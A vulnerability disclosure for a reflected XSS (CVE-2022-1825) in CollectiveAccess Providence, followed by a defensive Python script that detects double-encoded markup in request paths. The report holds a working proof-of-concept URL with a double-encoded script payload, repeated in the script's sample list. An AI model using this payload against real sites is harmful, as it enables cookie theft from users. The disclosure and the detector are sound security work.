Headline
CVE-2022-1825: Reflected XSS in providence
Cross-site Scripting (XSS) - Reflected in GitHub repository collectiveaccess/providence prior to 1.8.
Description
Hello, I found an authenticated reflected XSS via a path fragment. This was exploitable through trusting user input in the URL path fragment. Please note: if you write a different payload, you need to URL-encode the payload twice.
Proof of Concept
Enter this URL: https://demo.collectiveaccess.org/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E
Kind Regards,
Rawi (@0xRaw)
Impact
Steal user cookies or redirect the user to malicious sites.
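
A defensive check for the double-encoding point in the report, added here as an example (not code from the report or from the Providence project): it percent-decodes a request path until it stops changing, shows that the angle brackets only become visible after the second pass, and HTML-escapes the result as a page should before echoing it. The function names, the decode cap and the two benign sample paths are assumptions.

```python
import html
import re
from urllib.parse import unquote

MARKUP = re.compile(r'[<>"\']')
MAX_ROUNDS = 5  # assumption: cap on decode passes so crafted input cannot loop us


def decode_layers(path):
    """Percent-decode until the value stops changing; return (decoded, layers)."""
    layers = 0
    for _ in range(MAX_ROUNDS):
        nxt = unquote(path)
        if nxt == path:
            break
        path, layers = nxt, layers + 1
    return path, layers


def inspect_path(path):
    """Classify one request path taken from an access log."""
    decoded, layers = decode_layers(path)
    once = unquote(path)
    return {
        "layers": layers,
        # markup characters a filter that decodes only once would see
        "visible_after_one_decode": sorted(set(MARKUP.findall(once))),
        # markup characters present once every encoding layer is removed
        "visible_after_full_decode": sorted(set(MARKUP.findall(decoded))),
        "suspicious": layers >= 2 and bool(MARKUP.search(decoded)),
        # the value as it should be written into HTML if it is echoed at all
        "safe_to_echo": html.escape(decoded, quote=True),
    }


# Constructed sample: the first path is the one from the report above,
# the other two are benign paths made up for comparison.
SAMPLE_PATHS = [
    "/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E",
    "/index.php/system/Error/Show/n/3250",
    "/files/annual%20report.pdf",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        r = inspect_path(p)
        print(r["layers"], r["suspicious"], r["safe_to_echo"])
```

A filter that inspects the path after a single decode sees only the double quote here, which is why the check counts layers and inspects the fully decoded value.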